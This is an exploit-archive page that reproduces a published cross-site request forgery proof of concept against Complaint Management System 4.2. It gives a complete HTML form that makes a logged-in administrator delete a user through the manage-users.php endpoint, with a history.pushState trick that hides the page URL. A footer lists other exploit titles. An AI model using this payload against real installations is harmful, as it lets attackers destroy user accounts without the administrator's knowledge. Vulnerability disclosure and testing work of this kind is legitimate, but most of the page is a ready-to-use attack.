Complaint management system 4.2 crosssite request forgery (delete user) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-04-23 | Type : webapps | Platform : php
This exploit / vulnerability Complaint management system 4.2 crosssite request forgery (delete user) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)
# Author: Besim ALTINOK
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/complaint-management-sytem/
# Version: v4.2
# Tested on: Xampp
# Credit: İsmail BOZKURT
*************************************************
Detail:

You can perform CSRF Attack for all the functions.

----------------------------------------------

CSRF PoC for Delete User
----------------------------------------------
This request performs over the GET request with uid.
------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/cms/admin/manage-users.php">
<input type="hidden" name="uid" value="4" />
<input type="hidden" name="" value="" />
<input type="hidden" name="action" value="del" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Complaint management system 4.2 crosssite request forgery (delete user)


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Complaint management system 4.2 crosssite request forgery (delete user) Vulnerability / Exploit